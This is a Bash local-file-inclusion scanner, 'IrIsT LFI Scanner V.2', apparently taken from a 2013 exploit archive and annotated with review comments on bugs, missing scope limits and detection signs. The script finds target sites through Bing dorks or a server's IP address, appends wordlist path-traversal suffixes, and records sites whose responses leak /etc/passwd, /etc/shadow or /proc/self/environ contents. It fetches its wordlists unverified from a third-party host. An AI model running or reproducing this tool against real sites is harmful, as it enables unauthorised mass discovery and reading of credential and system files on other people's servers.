
IrIsT LFI Scanner V.2

Author: Beni_Vanda , Published: 21-02-2013
#!/bin/sh
# "*****************************************************************"
# "* In The Name Of ALLAH *"
# "* IrIsT LFI Scanner V.2 *"
# "* www.IrIsT.Ir *"
# "* Coded By : Beni_Vanda *"
# "* Gr33tz : All Turkish/Iranian/Kurdish Hackerz *"
# "* Beni_Vanda@yahoo.com *"
# "*****************************************************************"

# Pagination state shared by the Bing result loops in Searching_Lfi_On_Bing
# and Searching_Lfi_On_Server. Those loops keep fetching result pages while
# last_page_check is empty, how_many is non-empty and single_page is empty.
# page is the counter interpolated into the "first=" query parameter.
page=0
# Filled when the result counter reads "A-B of B" (the last page was fetched).
last_page_check=
# Text of the result counter; starts non-empty so the first loop test passes.
how_many=1
# Filled when the counter shows a single-digit "N results" total.
single_page=

#######################################
# Searching_Lfi_On_Bing: search-engine-driven local-file-inclusion probe.
# Reads a search dork from stdin, pages through Bing results for it, keeps
# the result links whose text matches the dork's path, reduces them to
# roughly one URL per host, then requests each URL with every suffix from
# passwd.txt, shadow.txt and proc.txt appended and checks the response body
# for file-content markers.
# Globals:  page, last_page_check, how_many, single_page (read and written)
# Inputs:   DORK_SERVER from stdin; passwd.txt, shadow.txt, proc.txt in cwd
# Outputs:  progress on stdout; matching URLs appended to
#           Vulnerability_list.txt
# Exits:    status 1 when the collected link file is empty
# NOTE(review): the hosts come straight from search results; nothing in this
# function limits the run to an agreed scope or allow-list.
# NOTE(review): values parsed out of fetched HTML are later expanded
# unquoted into curl and egrep arguments, so they undergo word splitting and
# globbing, and a value starting with "-" would be parsed as an option.
# Detection: the probes are plain GETs from curl invoked with only --silent
# (default curl User-Agent unless the operator's curl config changes it),
# repeated against one endpoint with wordlist-driven suffixes. A response
# line containing "root:x:0:", "root:", "DOCUMENT_ROOT=" or "TERM=xterm" is
# what the script records as a hit.
#######################################
function Searching_Lfi_On_Bing()
{
echo -e "\e[1;31mPlz input URL Drok \e[0m: ";
# read without -r: backslashes in the typed dork are interpreted.
read DORK_SERVER

echo -e "\e[1;35mSearching With Bing Bot Plz W8 \e[0m: ";

# Page through the results until one of the three stop markers is set.
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

# The dork is placed in the query string as typed (no URL-encoding); the
# "first=" offset is the page counter followed by a literal 0.
url="http://www.bing.com/search?q=%27$DORK_SERVER%27&qs=n&pq=%27$DORK_SERVER%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"

# The result page is saved under a fixed name in the current directory.
wget -q -O domain_bing.php "$url"

# Non-empty when the counter reads "A-B of B".
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

# First three space-separated words of the counter text; empty when the
# counter element is absent from the page.
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

# Non-empty when the counter shows a single-digit result total.
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `

# Collect the href of every <h3><a href="..."> result link. egrep reads the
# file named as its argument; the piped cat output is not used.
cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing_bing.txt
rm -f domain_bing.php;
let page=$page+1;
done

# Stop when the link file has size 0 (size taken from column 5 of ls -l).
if [ `ls -l alldomain_bing_bing.txt | awk '{print $5}'` -eq 0 ]
then
echo -e "\e[1;31mNot Found $DORK_SERVER on Bing :| ...\e[0m"
echo -e "\e[1;31mExited !! ...\e[0m"
exit 1;
fi

# Normalise: drop the scheme, drop "www" plus the following character,
# lower-case, sort and de-duplicate. The result is appended, not overwritten.
cat alldomain_bing_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains_bing.txt
rm -f alldomain_bing_bing.txt;

# Keep only the part of the dork before the first "?" (the path part).
dork=`echo "$DORK_SERVER" | cut -d '?' -f 1`

# Split the normalised links into those that match the dork path (used as an
# extended regex) and those that do not.
for line_test in `cat domains_bing.txt`
do
varfor=`echo "$line_test" | egrep "$dork"`

if [ -z $varfor ]
then
echo "$line_test" >>should_delete_bing.txt
else
echo "$line_test" | sort | uniq >>should_test_bing.txt
fi
done

touch domain_sorted_bing.txt;

# Keep a link only if its host part (text before the first "/") does not
# already match a line in domain_sorted_bing.txt. The host is used as an
# unquoted regex, so "." matches any character.
for namedomain in `cat should_test_bing.txt`
do
domaincut=`echo "$namedomain" | cut -d '/' -f 1`
urlgreap=`cat domain_sorted_bing.txt | egrep $domaincut`
if [[ $urlgreap = "" ]]
then
echo "$namedomain" >>domain_sorted_bing.txt
fi
done

# Probe every remaining link with the three wordlists in turn. Each inner
# loop stops at the first suffix whose response contains the marker.
for line_sorted_bing in `cat domain_sorted_bing.txt`
do
###################### check passwd Keyword #######################
echo -e "\e[1;36mnow searching with /etc/passwd keyword on $line_sorted_bing ...\e[0m"

for url_passwd in `cat passwd.txt`
do
# Hit condition: any response line containing "root:x:0:".
str=`curl --silent $line_sorted_bing$url_passwd | awk '/root:x:0:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted_bing$url_passwd\e[0m"
echo $line_sorted_bing$url_passwd >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check shadow Keyword #######################
echo -e "\e[1;36mnow searching with /etc/shadow keyword on $line_sorted_bing ...\e[0m"

for url_shadow in `cat shadow.txt`
do
# Hit condition: any response line containing "root:". This is a loose
# marker, so unrelated pages containing that text are also recorded.
str=`curl --silent $line_sorted_bing$url_shadow | awk '/root:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
# The console message expands $line_sorted, which this function never
# assigns; the line written to the file uses $line_sorted_bing.
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted$url_shadow\e[0m"
echo $line_sorted_bing$url_shadow >>Vulnerability_list.txt
break
fi
done
###################### check shadow Keyword #######################

###################### check proc Keyword #######################
echo -e "\e[1;36mnow searching with /proc/self/environ keyword on $line_sorted_bing ...\e[0m"

for url_proc in `cat proc.txt`
do
# The same URL is fetched twice, once per marker, so each candidate shows up
# as two identical requests in the target's access log.
str=`curl --silent $line_sorted_bing$url_proc | awk '/DOCUMENT_ROOT=/ { print }'`
str2=`curl --silent $line_sorted_bing$url_proc | awk '/TERM=xterm/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted_bing$url_proc\e[0m"
echo $line_sorted_bing$url_proc >>Vulnerability_list.txt
break
fi

done
###################### check proc Keyword #######################
done

}


#######################################
# Searching_Lfi_On_Server: the same probe, limited to sites that Bing lists
# for one IP address.
# Reads a host (IP or name) and a dork from stdin, resolves a name with the
# external resolveip utility, pings the address, queries Bing with
# "ip:<IP> '<dork>'", then filters, de-duplicates and probes the result
# links with the passwd.txt, shadow.txt and proc.txt suffix lists.
# Globals:  page, last_page_check, how_many, single_page (read and written)
# Inputs:   IP_SERVER and DORK_SERVER from stdin; the three wordlists in cwd
# Outputs:  progress on stdout; matching URLs appended to
#           Vulnerability_list.txt
# Exits:    on resolve failure, on ping failure (status 1), or when the
#           collected link file is empty (status 1)
# NOTE(review): every site that the search engine associates with the
# address is probed; nothing here limits the run to an agreed scope.
# NOTE(review): values parsed out of fetched HTML are later expanded
# unquoted into curl and egrep arguments (word splitting, globbing, and
# option parsing for values starting with "-").
# Detection: three ICMP echo requests to the address come first, followed by
# bursts of GETs from curl (invoked with only --silent) against each hosted
# site, with wordlist-driven suffixes appended to one endpoint.
#######################################
function Searching_Lfi_On_Server()
{
echo -e "\e[1;31mPlz input Server IP Or Domain \e[0m: ";
read IP_SERVER
echo -e "\e[1;31mPlz input URL Drok \e[0m: ";
read DORK_SERVER

# The pattern is not anchored: input that merely contains a dotted-quad-like
# or bracketed hex/colon substring is used as the address unchanged.
if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then
IP="$IP_SERVER"
else
IP=`resolveip -s "$IP_SERVER"`
if [ "$?" != 0 ]; then
echo "Error: cannot resolve $IP_SERVER to an IP"
# Bare exit: the script ends with the status of the preceding echo.
exit
fi
fi


# Check Server Status
# $IP is passed unquoted, so it is word-split before ping sees it.
ping -c 3 $IP
if [ $? -ne 0 ]
then
echo "Server $IP is down :| >> Program Exit "
exit 1
fi

echo -e "\e[1;35mSearching With Bing Bot Plz W8 \e[0m: ";

# Page through the results until one of the three stop markers is set.
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

# Query is "ip:<IP> '<dork>'"; neither value is URL-encoded. The "first="
# offset is the page counter followed by a literal 1.
url="http://www.bing.com/search?q=ip%3a$IP+%27$DORK_SERVER%27&qs=n&pq=ip%3a$IP+%27$DORK_SERVER%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"

# The result page is saved under a fixed name in the current directory.
wget -q -O domain_bing.php "$url"

# Non-empty when the counter reads "A-B of B".
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

# First three space-separated words of the counter text; empty when the
# counter element is absent from the page.
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

# Non-empty when the counter shows a single-digit result total.
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `

# Collect the href of every <h3><a href="..."> result link. egrep reads the
# file named as its argument; the piped cat output is not used.
cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php;
let page=$page+1;
done

# Stop when the link file has size 0 (size taken from column 5 of ls -l).
if [ `ls -l alldomain_bing.txt | awk '{print $5}'` -eq 0 ]
then
echo -e "\e[1;31mNot Found $DORK_SERVER on $IP_SERVER ...\e[0m"
echo -e "\e[1;31mExited !! ...\e[0m"

exit 1;
fi

# Normalise: drop the scheme, drop "www" plus the following character,
# lower-case, sort and de-duplicate. The result is appended, not overwritten.
cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt
rm -f alldomain_bing.txt;

# Keep only the part of the dork before the first "?" (the path part).
dork=`echo "$DORK_SERVER" | cut -d '?' -f 1`

# Split the normalised links into those that match the dork path (used as an
# extended regex) and those that do not.
for line_test in `cat domains.txt`
do
varfor=`echo "$line_test" | egrep "$dork"`

if [ -z $varfor ]
then
echo "$line_test" >>should_delete.txt
else
echo "$line_test" | sort | uniq >>should_test.txt
fi
done

touch domain_sorted.txt;

# Keep a link only if its host part (text before the first "/") does not
# already match a line in domain_sorted.txt. The host is used as an unquoted
# regex, so "." matches any character.
for namedomain in `cat should_test.txt`
do
domaincut=`echo "$namedomain" | cut -d '/' -f 1`
urlgreap=`cat domain_sorted.txt | egrep $domaincut`
if [[ $urlgreap = "" ]]
then
echo "$namedomain" >>domain_sorted.txt
fi
done

# Probe every remaining link with the three wordlists in turn. Each inner
# loop stops at the first suffix whose response contains the marker.
for line_sorted in `cat domain_sorted.txt`
do
###################### check passwd Keyword #######################
echo -e "\e[1;36mnow searching with /etc/passwd keyword on $line_sorted ...\e[0m"

for url_passwd in `cat passwd.txt`
do
# Hit condition: any response line containing "root:x:0:".
str=`curl --silent $line_sorted$url_passwd | awk '/root:x:0:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted$url_passwd\e[0m"
echo $line_sorted$url_passwd >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check shadow Keyword #######################
echo -e "\e[1;36mnow searching with /etc/shadow keyword on $line_sorted ...\e[0m"

for url_shadow in `cat shadow.txt`
do
# Hit condition: any response line containing "root:". This is a loose
# marker, so unrelated pages containing that text are also recorded.
str=`curl --silent $line_sorted$url_shadow | awk '/root:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted$url_shadow\e[0m"
echo $line_sorted$url_shadow >>Vulnerability_list.txt
break
fi
done
###################### check shadow Keyword #######################

###################### check proc Keyword #######################
echo -e "\e[1;36mnow searching with /proc/self/environ keyword on $line_sorted ...\e[0m"

for url_proc in `cat proc.txt`
do
# The same URL is fetched twice, once per marker, so each candidate shows up
# as two identical requests in the target's access log.
str=`curl --silent $line_sorted$url_proc | awk '/DOCUMENT_ROOT=/ { print }'`
str2=`curl --silent $line_sorted$url_proc | awk '/TERM=xterm/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $line_sorted$url_proc\e[0m"
echo $line_sorted$url_proc >>Vulnerability_list.txt
break
fi

done
###################### check proc Keyword #######################
done

}


#######################################
# Searching_Lfi_On_Url: probe a single URL prefix supplied by the operator.
# Reads the prefix from stdin and requests it with every suffix from
# passwd.txt, shadow.txt and proc.txt appended, checking each response body
# for a file-content marker. Each of the three loops stops at its first hit.
# Inputs:   URL_Domain from stdin; the three wordlists in cwd
# Outputs:  progress on stdout; matching URLs appended to
#           Vulnerability_list.txt
# NOTE(review): $URL_Domain and the wordlist entries reach curl unquoted, so
# they are word-split and glob-expanded by the shell first.
# Detection: a run of GETs from curl (invoked with only --silent) to one
# endpoint whose trailing part changes on every request; the markers checked
# in the responses are "root:x:0:", "root:", "DOCUMENT_ROOT=" and
# "TERM=xterm".
#######################################
function Searching_Lfi_On_Url()
{
echo -e "\e[1;31mPlz input URL link \e[0m: ";
read URL_Domain

echo "Vulnerability URL's will be Store at Vulnerability_list.txt ..."
echo "starting ..."

###################### check passwd Keyword #######################
echo -e "\e[1;36mnow searching with /etc/passwd keyword....\e[0m"

for url_passwd in `cat passwd.txt`
do
# Hit condition: any response line containing "root:x:0:".
str=`curl --silent $URL_Domain$url_passwd | awk '/root:x:0:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $URL_Domain$url_passwd\e[0m"
echo $URL_Domain$url_passwd >>Vulnerability_list.txt
break
fi
done
###################### check passwd Keyword #######################

###################### check shadow Keyword #######################
echo -e "\e[1;36mnow searching with /etc/shadow keyword ....\e[0m"

for url_shadow in `cat shadow.txt`
do
# Hit condition: any response line containing "root:". This is a loose
# marker, so unrelated pages containing that text are also recorded.
str=`curl --silent $URL_Domain$url_shadow | awk '/root:/ { print }'`
if [[ $str = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $URL_Domain$url_shadow\e[0m"
echo $URL_Domain$url_shadow >>Vulnerability_list.txt
break
fi
done
###################### check shadow Keyword #######################

###################### check proc Keyword #######################
echo -e "\e[1;36mnow searching with /proc/self/environ keyword....\e[0m"

for url_proc in `cat proc.txt`
do
# The same URL is fetched twice, once per marker, so each candidate shows up
# as two identical requests in the target's access log.
str=`curl --silent $URL_Domain$url_proc | awk '/DOCUMENT_ROOT=/ { print }'`
str2=`curl --silent $URL_Domain$url_proc | awk '/TERM=xterm/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then
echo -e "\e[1;34m[*] Trying ... >> Not Found \e[0m"
else
echo -e "\e[1;32m[*] Trying ... >> Found >> $URL_Domain$url_proc\e[0m"
echo $URL_Domain$url_proc >>Vulnerability_list.txt
break
fi

done
###################### check proc Keyword #######################
}


#######################################
# main: prepare the working directory and wordlists, show the menu, dispatch
# to one of the three scan functions, then delete intermediate files.
# Inputs:   menu choice from stdin
# Outputs:  IrIsTLFI/ under the current directory, holding the downloaded
#           wordlists, download_*.log files and the scan output
# Exits:    0 for option 4, 1 for an unrecognised option
# NOTE(review): the five wordlists are fetched over plain HTTP from a
# third-party host and used without any integrity check, so whoever controls
# that host or the network path decides what the later curl requests
# contain. Only passwd.txt, shadow.txt and proc.txt are read by the scan
# functions in this file; security.txt and group.txt are downloaded but not
# referenced.
# Forensics: files that remain after a run are the wordlists, the
# download_*.log files, Vulnerability_list.txt and domain_sorted_bing.txt.
# The cleanup at the end is skipped whenever a scan function calls exit.
#######################################
function main()
{
echo -e "\e[1;35mdownloading required file plz w8...\e[0m"
# The test names IrIsLFI while mkdir and cd use IrIsTLFI, so mkdir is
# attempted on every run where a directory named IrIsLFI does not exist.
if [[ ! -d IrIsLFI ]]; then
mkdir IrIsTLFI;
fi

# The result of cd is not checked; on failure everything below runs in the
# caller's directory.
cd IrIsTLFI;
# Each list is fetched only when no local copy exists; wget -o sends the
# transfer log to the named file and the list is saved under its remote name.
if [ ! -f shadow.txt ]; then
wget -o download_shadow.log http://benivanda.persiangig.com/tools/lfi-scanner/shadow.txt
fi

if [ ! -f security.txt ]; then
wget -o download_security.log http://benivanda.persiangig.com/tools/lfi-scanner/security.txt
fi

if [ ! -f proc.txt ]; then
wget -o download_proc.log http://benivanda.persiangig.com/tools/lfi-scanner/proc.txt
fi

if [ ! -f passwd.txt ]; then
wget -o download_passwd.log http://benivanda.persiangig.com/tools/lfi-scanner/passwd.txt
fi

if [ ! -f group.txt ]; then
wget -o download_group.log http://benivanda.persiangig.com/tools/lfi-scanner/group.txt
fi

echo -e "\e[1;33m1) Searching LFI Bug on Serevr with Dork <ip> <dork> \e[0m"
echo -e "\e[1;33m2) Searching LFI bug With Dork <dork> \e[0m"
echo -e "\e[1;33m3) Searching LFI bug on URL \e[0m"
echo -e "\e[1;33m4) Exit \e[0m"

echo -e "\e[1;31mPlease select one of the following \e[0m: ";
read option;

# Dispatch on the menu choice; options 4 and the default leave the script
# here, before the cleanup below.
case $option in
1)
Searching_Lfi_On_Server;;
2)
Searching_Lfi_On_Bing;;
3)
Searching_Lfi_On_Url;;
4)
exit 0;;
*)
echo "Wrong Parametr ; Plz try again ...";
exit 1;;
esac

# Remove intermediate files. domain_sorted_bing.txt is not in this list, and
# the scan functions append to it, so entries from earlier runs persist.
rm -f alldomain_bing_bing.txt;
rm -f domains_bing.txt
rm -f should_test_bing.txt
rm -f should_test.txt
rm -f should_delete_bing.txt
rm -f should_delete.txt
rm -f domains.txt
rm -f domain_sorted.txt

}

# Entry point: run the interactive menu. No command-line arguments are
# passed on, so every input is read from stdin.
main;
